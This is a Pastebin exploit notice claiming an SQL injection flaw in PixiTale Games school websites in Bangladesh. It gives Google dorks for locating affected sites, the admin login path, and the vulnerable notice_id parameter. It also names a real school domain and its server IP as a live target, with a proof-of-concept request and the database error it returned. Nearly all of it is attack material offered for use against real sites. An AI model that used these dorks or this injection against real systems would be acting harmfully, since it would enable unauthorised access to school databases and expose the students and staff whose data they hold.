Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ############################################################
- # Exploit Title : By Prodigy PixiTale Games Bangladesh Education SQL Injection Vulnerability
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 08/01/2019
- # Vendor Homepage : pixitale.com
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : intext:''Designed by PIXITALE GAMES.'' site:edu.bd
- intext:''By Prodigy. Copyright © PIXITALE GAMES''
- intext:''Copyright © 2017 PIXITALE GAMES.
- Designed by PIXITALE GAMES. All rights reserved.''
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- CXSecurity Exploit Reference Link :
- cxsecurity.com/issue/WLB-2019010053
- ############################################################
- # Admin Panel Login Path :
- **************************
- /admin/
- # SQL Injection Exploit :
- **************************
- /notice.php?notice_id=[SQL Injection]
- ############################################################
- # Example Vulnerable Site =>
- **************************
- Note => (192.185.171.2) => There are 46 domains hosted on this server.
- [+] sjs.edu.bd/notice.php?notice_id=439%27
- => [ Proof of Concept ] => archive.fo/ePLlF
- ############################################################
- # SQL Database Error :
- ********************
- Last query: SELECT * FROM notice WHERE id='439''
- Mysql error: You have an error in your SQL syntax;
- check the manual that corresponds to your
- MySQL server version for the
- right syntax to use near ''439''' at line 1
- ############################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ############################################################
Add Comment
Please, Sign In to add comment